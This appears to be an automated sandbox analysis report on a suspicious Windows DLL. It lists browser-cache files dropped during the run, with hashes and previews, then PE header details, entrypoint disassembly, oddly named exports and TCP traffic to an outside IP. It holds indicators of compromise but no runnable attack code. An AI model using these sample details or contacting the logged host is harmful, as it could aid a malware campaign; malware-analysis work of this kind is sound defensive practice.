                                                                                                                                                                                                                              Preview: GIF89a2.2.....7..;..?..C..I..H..<..9.....8..F..7..E..@..C..@..6..9..8..J..*z.G..>..?..A..6..>..8..:..A..=..B..4..B..D..=..K..=..@..<..:..3~.B..D.....,|.4..2..6..:..J..;..G....Fl..1}.4..R.....Y..E..>..9..5..X..A..2..P..J../|.9.....T.+Z.....+..<.Fq.Gn..V..;..7.Lr..W..C..<.Fp.]......A.....0{.L..E..H..@.....3..3..O..M..K....#[.3i..D..>........I....<n..;..Z..1..G..8..E....Hu..1..>..T..a.Fs..C..8..0}....;..6..t.Ft..5.Bi..:.x...E.....'z^~.......[....8`..........;..@..B.....7.....<.................F.....6...........>..?.n......g.......s...)a.Cm....'a.0Z..7....3f..<.:e.....@.q.....Ds..B....!P.n...J............Li..=......F.....B.....:r....w..|..........`..[}.g...J.Ms..K.Ft.....'..>..........Ry.Nv.n..]..Bl........S..;....Dj.....=.....O.y.......6..J.......)V..g..5.......!..NETSCAPE2.0.....!...d...,....2.2........3.`..9.(|.d.C .wH.(."D...(D.....d.Y......<.(PP.F...dL.@.&.28..$1S....*TP......>...L..!T.X!.(..@a..IsgM..|..Jc(Q.+.......2.:.)y2.J......W,..eW2.!....!....C.....d...zeh....P.
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\BBX2afX[2].png
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):879
                                                                                                                                                                                                                              Entropy (8bit):7.684764008510229
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:nbwTOG/D9S9kmVgvOc0WL9P9juX7wlA3lrvfFRNa:bwTOk5S96vBB1jGwO3lzfxa
                                                                                                                                                                                                                              MD5:4AAAEC9CA6F651BE6C54B005E92EA928
                                                                                                                                                                                                                              SHA1:7296EC91AC01A8C127CD5B032A26BBC0B64E1451
                                                                                                                                                                                                                              SHA-256:90396DF05C94DD44E772B064FF77BC1E27B5025AB9C21CE748A717380D4620DD
                                                                                                                                                                                                                              SHA-512:09E0DE84657F2E520645C6BE20452C1779F6B492F67F88ABC7AB062D563C060AE51FC1E99579184C274AC3805214B6061AEC1730F72A6445AEBDB7E9F255755F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: .PNG........IHDR................U....pHYs..........+.....!IDATx...K.Q..wfv.u.....*.,I"...)...z............>.OVObQ......d?|.....F.QI$....qf.s.....">y`......{~.6.Z.`.D[&.cV`..-8i...J.S.N..xf.6@.v.(E..S.....&...T...?.X)${.....s.l."V..r...PJ*!..p.4b}.=2...[......:.....LW3...A.eB.;...2...~...s_z.x|..o....+..x....KW.G2..9.....<.\....gv...n..1..0...1}....Ht_A.x...D..5.H.......W..$_\G.e;./.1R+v....j.6v........z.k............&..(....,F.u8^..v...d-.j?.w..;..O.<9$..A..f.k.Kq9..N..p.rP2K.0.).X.4..Uh[..8..h....O..V.%.f.......G..U.m.6$......X....../.=....f:.......|c(,.......l.\..<./..6...!...z(......# "S..f.Q.N=.0VQ._..|....>@....P.7T.$./)s....Wy..8..xV......D....8r."b@....:.E.E......._(....4w....Ir..e-5..zjg...e?./...|X..."!..'*/......OI..J"I.MP....#...G.Vc..E..m.....wS.&.K<...K*q..\...A..$.K......,...[..D...8.?..)..3....IEND.B`.
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\a8a064[1].gif
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 28 x 28
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):16360
                                                                                                                                                                                                                              Entropy (8bit):7.019403238999426
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:g2SEiHys4AeP/6ygbkUZp72i+ccys4AeP/6ygbkUZaoGBm:g2Tjs4Ae36kOpqi+c/s4Ae36kOaoGm
                                                                                                                                                                                                                              MD5:3CC1C4952C8DC47B76BE62DC076CE3EB
                                                                                                                                                                                                                              SHA1:65F5CE29BBC6E0C07C6FEC9B96884E38A14A5979
                                                                                                                                                                                                                              SHA-256:10E48837F429E208A5714D7290A44CD704DD08BF4690F1ABA93C318A30C802D9
                                                                                                                                                                                                                              SHA-512:5CC1E6F9DACA9CEAB56BD2ECEEB7A523272A664FE8EE4BB0ADA5AF983BA98DBA8ECF3848390DF65DA929A954AC211FF87CE4DBFDC11F5DF0C6E3FEA8A5740EF7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: GIF89a.......dbd...........lnl.........trt..................!..NETSCAPE2.0.....!.......,..........+..I..8...`(.di.h..l.p,..(.........5H.....!.......,.........dbd...........lnl......dfd....................../..I..8...`(.di.h..l..e.....Q... ..-.3...r...!.......,.........dbd..............tvt...........................*P.I..8...`(.di.h.v.....A<.. ......pH,.A..!.......,.........dbd........|~|......trt...ljl.........dfd......................................................B`%.di.h..l.p,.t]S......^..hD..F. .L..tJ.Z..l.080y..ag+...b.H...!.......,.........dbd.............ljl.............dfd........lnl..............................................B.$.di.h..l.p.'J#............9..Eq.l:..tJ......E.B...#.....N...!.......,.........dbd...........tvt.....ljl.......dfd.........|~|.............................................D.$.di.h..l.NC.....C...0..)Q..t...L:..tJ.....T..%...@.UH...z.n.....!.......,.........dbd..............lnl.........ljl......dfd...........trt...
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\de-ch[1].htm
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):424625
                                                                                                                                                                                                                              Entropy (8bit):5.43920457346751
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:/fKJUixx+PAkJ8TFHX81PAUYCSDVvoKzrW39vqLCFQGXmW31zf7hLZ:/fKdOPLD8QzNx12sr7j
                                                                                                                                                                                                                              MD5:53F4C099E8CAE84650E8F1836D07F4E4
                                                                                                                                                                                                                              SHA1:158DC65DFFBD6E72A9185C40DEC9ABBDE6A97A62
                                                                                                                                                                                                                              SHA-256:C1DBB15CC74F4C8441F9E03544E227AFD24E4D3346F8AB08CBE749B8EDE6DAAD
                                                                                                                                                                                                                              SHA-512:2A2013226E63FA3D174A40877127606A4B1F739E785DE90DF0A0990E01AE2BE192AF1B59622675A80578386D32D3441178D93CDDCC2BBD80923A4F484E3E988F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: <!DOCTYPE html><html prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#" lang="de-CH" class="hiperf" dir="ltr" >.. <head data-info="v:20211114_25718401;a:b3431c51-025e-4cc1-b783-1f71cd7a2e30;cn:6;az:{did:2be360ae5c6345da911d978376c0449f, rid: 6, sn: neurope-prod-hp, dt: 2021-11-21T10:37:59.2536968Z, bt: 2021-11-14T01:17:13.2620239Z};ddpi:1;dpio:;dpi:1;dg:tmx.pc.ms.ie10plus;th:start;PageName:startPage;m:de-ch;cb:;l:de-ch;mu:de-ch;ud:{cid:,vk:homepage,n:,l:de-ch,ck:};xd:BBqgbZW;ovc:f;al:;fxd:f;xdpub:2021-08-11 10:21:32Z;xdmap:2021-11-23 09:50:10Z;axd:;f:msnallexpusers,pneedge3cf,platagyhp1cf,pnehz3cf,compliancehz1cf,article2cf,gallery1cf,gallery2cf,onetrustpoplive,1s-bing-news,vebudumu04302020,bbh20200521msncf,weather2cf,1s-br30min,btrecrow1,1s-winauthservice,1s-winsegservice,wf-sunny-first,weather10cf,msnapp8cf,prong2c,1s-pagesegservice,routentpring2c;userOptOut:false;userOptOutOptions:" data-js="{&quot;dpi&quot;:1.0,&quot;ddpi&quot;:1.0,&quot;dpio&quot;:null,&quot;forcedpi&
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\e151e5[1].gif
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                              Entropy (8bit):3.122191481864228
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:CUTxls/1h/:7lU/
                                                                                                                                                                                                                              MD5:F8614595FBA50D96389708A4135776E4
                                                                                                                                                                                                                              SHA1:D456164972B508172CEE9D1CC06D1EA35CA15C21
                                                                                                                                                                                                                              SHA-256:7122DE322879A654121EA250AEAC94BD9993F914909F786C98988ADBD0A25D5D
                                                                                                                                                                                                                              SHA-512:299A7712B27C726C681E42A8246F8116205133DBE15D549F8419049DF3FCFDAB143E9A29212A2615F73E31A1EF34D1F6CE0EC093ECEAD037083FA40A075819D2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\jquery-2.1.1.min[1].js
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):84249
                                                                                                                                                                                                                              Entropy (8bit):5.369991369254365
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:DPEkjP+iADIOr/NEe876nmBu3HvF38NdTuJO1z6/A4TqAub0R4ULvguEhjzXpa9r:oNM2Jiz6oAFKP5a98HrY
                                                                                                                                                                                                                              MD5:9A094379D98C6458D480AD5A51C4AA27
                                                                                                                                                                                                                              SHA1:3FE9D8ACAAEC99FC8A3F0E90ED66D5057DA2DE4E
                                                                                                                                                                                                                              SHA-256:B2CE8462D173FC92B60F98701F45443710E423AF1B11525A762008FF2C1A0204
                                                                                                                                                                                                                              SHA-512:4BBB1CCB1C9712ACE14220D79A16CAD01B56A4175A0DD837A90CA4D6EC262EBF0FC20E6FA1E19DB593F3D593DDD90CFDFFE492EF17A356A1756F27F90376B650
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: /*! jQuery v2.1.1 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */..!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l=a.document,m="2.1.1",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return n.each(this,a,b)},map:function(a){return this.pushStack(n.map(this,funct
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\~DF45825F63611628F7.TMP
                                                                                                                                                                                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):176128
                                                                                                                                                                                                                              Entropy (8bit):3.334964652553981
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:AZ/2Bfcdmu5kgTzGtfZ/2Bfc+mu5kgTzGt:5M
                                                                                                                                                                                                                              MD5:6A627D6B64FE34D0B7DB804243065783
                                                                                                                                                                                                                              SHA1:8A748CA1491DF84FFA5B5D4D2A06EEC17494432C
                                                                                                                                                                                                                              SHA-256:7DD2D0CACFC5751DC032E29F469890F89358864324730188F07621EB8D7F3E63
                                                                                                                                                                                                                              SHA-512:6FAEF9E76BA136F9648857E8030E80709672B72BD0E16115EF5155BB5B128BF0211065B3BC9CCFD94C147778F3E4DD183F585D928EEF888C1031DEF46FC10F34
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\~DFCCE32108ABF6B532.TMP
                                                                                                                                                                                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):16384
                                                                                                                                                                                                                              Entropy (8bit):0.08190170918129491
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Jf/RRRlKVAnRR6Zknl6/lclllv/nt+lybltll1lRslkhlEkllAr9J/RRBFhJ/RRb:x9lOFZ0+UFAlkxIflzJX
                                                                                                                                                                                                                              MD5:F922CB9DE2EFEDD152591137E34DF43E
                                                                                                                                                                                                                              SHA1:82CBACE5D84D5D7EE068C87AA3A94E2803E145CB
                                                                                                                                                                                                                              SHA-256:BBFF737D53E4C0C17CE1998CBBBD59D1F6F7CCE60F81668FF75353FA615698DE
                                                                                                                                                                                                                              SHA-512:6BC9F13D1B27661BDC697ECCA9F5E085D5D5E8DB3AE20E0D4E356F67071AF6DDD583C5030A05232CF40809C34DD1960615AA96C353BA92955ECC08C88FB8AF94
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              Static File Info

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Entropy (8bit):7.138662325535767
                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                              • Win32 Dynamic Link Library (generic) (1002004/3) 99.40%
                                                                                                                                                                                                                              • Clipper DOS Executable (2020/12) 0.20%
                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.20%
                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                              File name:WTXuYxax6d.dll
                                                                                                                                                                                                                              File size:125952
                                                                                                                                                                                                                              MD5:cbe2a109ef92af54de51a534980151a7
                                                                                                                                                                                                                              SHA1:e71ab85a35df851229f87fde059ad35ed167bdbc
                                                                                                                                                                                                                              SHA256:450a436cf830b03533a2ce0d8d40724d61c8b0e5f8164413c05d2c870b4ba8eb
                                                                                                                                                                                                                              SHA512:c30e3d42ed63a1327088111cc7ad3baa11149d5a9c9b7778a7561bc67a38c07be01978654128f29486c595441cc13a82ceaf6026ec9b04bbf5e2f1fd01c06020
                                                                                                                                                                                                                              SSDEEP:3072:FSGsYBXQAs5JLGk+9wDTXSH1/FKBl0C7p+1mwu/:FELKkOh4B2Cd+Tu/
                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................................................................................................................................

                                                                                                                                                                                                                              File Icon

                                                                                                                                                                                                                              Icon Hash:74f0e4ecccdce0e4

                                                                                                                                                                                                                              Static PE Info

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Entrypoint:0x100071f1
                                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                                              Imagebase:0x10000000
                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                                                                                              Time Stamp:0x619A563C [Sun Nov 21 14:22:52 2021 UTC]
                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                              OS Version Major:6
                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                              File Version Major:6
                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                              Subsystem Version Major:6
                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                              Import Hash:4c89e39b5ebc619c69b957c6b4f65780

                                                                                                                                                                                                                              Entrypoint Preview

                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                              mov ebp, esp
                                                                                                                                                                                                                              cmp dword ptr [ebp+0Ch], 01h
                                                                                                                                                                                                                              jne 00007F1EDC99D0F7h
                                                                                                                                                                                                                              call 00007F1EDC99D279h
                                                                                                                                                                                                                              push dword ptr [ebp+10h]
                                                                                                                                                                                                                              push dword ptr [ebp+0Ch]
                                                                                                                                                                                                                              push dword ptr [ebp+08h]
                                                                                                                                                                                                                              call 00007F1EDC99CFA3h
                                                                                                                                                                                                                              add esp, 0Ch
                                                                                                                                                                                                                              pop ebp
                                                                                                                                                                                                                              retn 000Ch
                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                              mov ebp, esp
                                                                                                                                                                                                                              push 00000000h
                                                                                                                                                                                                                              call dword ptr [1001100Ch]
                                                                                                                                                                                                                              push dword ptr [ebp+08h]
                                                                                                                                                                                                                              call dword ptr [10011008h]
                                                                                                                                                                                                                              push C0000409h
                                                                                                                                                                                                                              call dword ptr [10011010h]
                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                              call dword ptr [10011014h]
                                                                                                                                                                                                                              pop ebp
                                                                                                                                                                                                                              ret
                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                              mov ebp, esp
                                                                                                                                                                                                                              sub esp, 00000324h
                                                                                                                                                                                                                              push 00000017h
                                                                                                                                                                                                                              call dword ptr [10011018h]
                                                                                                                                                                                                                              test eax, eax
                                                                                                                                                                                                                              je 00007F1EDC99D0F7h
                                                                                                                                                                                                                              push 00000002h
                                                                                                                                                                                                                              pop ecx
                                                                                                                                                                                                                              int 29h
                                                                                                                                                                                                                              mov dword ptr [1001F228h], eax
                                                                                                                                                                                                                              mov dword ptr [1001F224h], ecx
                                                                                                                                                                                                                              mov dword ptr [1001F220h], edx
                                                                                                                                                                                                                              mov dword ptr [1001F21Ch], ebx
                                                                                                                                                                                                                              mov dword ptr [1001F218h], esi
                                                                                                                                                                                                                              mov dword ptr [1001F214h], edi
                                                                                                                                                                                                                              mov word ptr [1001F240h], ss
                                                                                                                                                                                                                              mov word ptr [1001F234h], cs
                                                                                                                                                                                                                              mov word ptr [1001F210h], ds
                                                                                                                                                                                                                              mov word ptr [1001F20Ch], es
                                                                                                                                                                                                                              mov word ptr [1001F208h], fs
                                                                                                                                                                                                                              mov word ptr [1001F204h], gs
                                                                                                                                                                                                                              pushfd
                                                                                                                                                                                                                              pop dword ptr [1001F238h]
                                                                                                                                                                                                                              mov eax, dword ptr [ebp+00h]
                                                                                                                                                                                                                              mov dword ptr [1001F22Ch], eax
                                                                                                                                                                                                                              mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                              mov dword ptr [0001F230h], eax

                                                                                                                                                                                                                              Data Directories

                                                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x19db00x25c.rdata
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x1a00c0x28.rdata
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x220000xf8.rsrc
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x230000xe68.reloc
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x196000x38.rdata
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x196380x40.rdata
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x110000x104.rdata
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                              Sections

                                                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                              .text0x10000xfdd80xfe00False0.686069758858data7.13842205011IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                              .rdata0x110000x95e60x9600False0.670651041667data6.50007500448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                              .data0x1b0000x69940x4200False0.885002367424data7.5794714709IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                              .rsrc0x220000xf80x200False0.3359375data2.51977440023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                              .reloc0x230000xe680x1000False0.716064453125data6.24269223414IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                              Resources

                                                                                                                                                                                                                              NameRVASizeTypeLanguageCountry
                                                                                                                                                                                                                              RT_MANIFEST0x220600x91XML 1.0 document textEnglishUnited States

                                                                                                                                                                                                                              Imports

                                                                                                                                                                                                                              DLLImport
                                                                                                                                                                                                                              KERNEL32.dllGetProcessHeap, WriteConsoleW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, InterlockedFlushSList, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, RaiseException, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapAlloc, HeapFree, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetStdHandle, GetFileType, LCMapStringW, GetStringTypeW, HeapSize, HeapReAlloc, SetStdHandle, FlushFileBuffers, WriteFile, GetConsoleCP, GetConsoleMode, SetFilePointerEx, CreateFileW, CloseHandle, DecodePointer

                                                                                                                                                                                                                              Exports

                                                                                                                                                                                                                              NameOrdinalAddress
                                                                                                                                                                                                                              DllRegisterServer10x100061f0
                                                                                                                                                                                                                              azfdnkcrayghb20x100065a0
                                                                                                                                                                                                                              bngggbakts30x10006500
                                                                                                                                                                                                                              cunlfsvblccv40x10006590
                                                                                                                                                                                                                              ebmjouyc50x100064f0
                                                                                                                                                                                                                              ekwbgjj60x100065b0
                                                                                                                                                                                                                              fdmhczzd70x100064c0
                                                                                                                                                                                                                              gspwisblvuftkl80x10006570
                                                                                                                                                                                                                              gwboxsvpsi90x100064b0
                                                                                                                                                                                                                              ikfxcxbdabudzqolj100x100064d0
                                                                                                                                                                                                                              ksljwhpnlr110x100064e0
                                                                                                                                                                                                                              lzojholmof120x10006600
                                                                                                                                                                                                                              ncupmigdtibtbdjf130x10006530
                                                                                                                                                                                                                              ndbzamsbksf140x100065d0
                                                                                                                                                                                                                              nsivlepszncwpueue150x10006550
                                                                                                                                                                                                                              nysmcddhsfh160x10006580
                                                                                                                                                                                                                              ofvladazig170x100065f0
                                                                                                                                                                                                                              psxkssj180x10006560
                                                                                                                                                                                                                              spihkiem190x100065c0
                                                                                                                                                                                                                              ulmdkxfqb200x10006520
                                                                                                                                                                                                                              wjjbdekzxjutynirw210x10006540
                                                                                                                                                                                                                              xyrxsfxubf220x100065e0
                                                                                                                                                                                                                              yusqfamwizitquyzv230x10006510
                                                                                                                                                                                                                              ywbiblphcylsyjl240x10006610

                                                                                                                                                                                                                              Possible Origin

                                                                                                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                              EnglishUnited States

                                                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                                                                              TCP Packets

                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                              Nov 23, 2021 10:52:20.997493982 CET49823443192.168.2.6104.26.7.139
                                                                                                                                                                                                                              Nov 23, 2021 10:52:20.997531891 CET44349823104.26.7.139192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:52:20.997647047 CET49823443192.168.2.6104.26.7.139
                                                                                                                                                                                                                              Nov 23, 2021 10:52:20.998980999 CET49823443192.168.2.6104.26.7.139
                                                                                                                                                                                                                              Nov 23, 2021 10:52:20.998991013 CET44349823104.26.7.139192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:52:21.008939981 CET49821443192.168.2.6104.26.7.139
                                                                                                                                                                                                                              Nov 23, 2021 10:52:21.008991957 CET44349821104.26.7.139192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:52:21.009099960 CET49821443192.168.2.6104.26.7.139
                                                                                                                                                                                                                              Nov 23, 2021 10:52:21.050046921 CET44349823104.26.7.139192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:52:21.050213099 CET49823443192.168.2.6104.26.7.139
                                                                                                                                                                                                                              Nov 23, 2021 10:52:21.100428104 CET49823443192.168.2.6104.26.7.139
                                                                                                                                                                                                                              Nov 23, 2021 10:52:21.100461006 CET44349823104.26.7.139192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:52:21.100904942 CET44349823104.26.7.139192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:52:21.101007938 CET49823443192.168.2.6104.26.7.139
                                                                                                                                                                                                                              Nov 23, 2021 10:52:21.106183052 CET49821443192.168.2.6104.26.7.139
                                                                                                                                                                                                                              Nov 23, 2021 10:52:21.106205940 CET44349821104.26.7.139192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:52:21.106602907 CET49823443192.168.2.6104.26.7.139
                                                                                                                                                                                                                              Nov 23, 2021 10:52:21.134586096 CET44349823104.26.7.139192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:52:21.134663105 CET44349823104.26.7.139192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:52:21.134705067 CET44349823104.26.7.139192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:52:21.134743929 CET44349823104.26.7.139192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:52:21.134779930 CET44349823104.26.7.139192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:52:21.134784937 CET49823443192.168.2.6104.26.7.139
                                                                                                                                                                                                                              Nov 23, 2021 10:52:21.134808064 CET44349823104.26.7.139192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:52:21.134833097 CET49823443192.168.2.6104.26.7.139
                                                                                                                                                                                                                              Nov 23, 2021 10:52:21.134850979 CET44349823104.26.7.139192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:52:21.134888887 CET44349823104.26.7.139192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:52:21.134917974 CET49823443192.168.2.6104.26.7.139
                                                                                                                                                                                                                              Nov 23, 2021 10:52:21.134922981 CET44349823104.26.7.139192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:52:21.134938002 CET49823443192.168.2.6104.26.7.139
                                                                                                                                                                                                                              Nov 23, 2021 10:52:21.134958029 CET44349823104.26.7.139192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:52:21.134965897 CET49823443192.168.2.6104.26.7.139
                                                                                                                                                                                                                              Nov 23, 2021 10:52:21.135008097 CET49823443192.168.2.6104.26.7.139
                                                                                                                                                                                                                              Nov 23, 2021 10:52:21.145387888 CET44349821104.26.7.139192.168.2.6
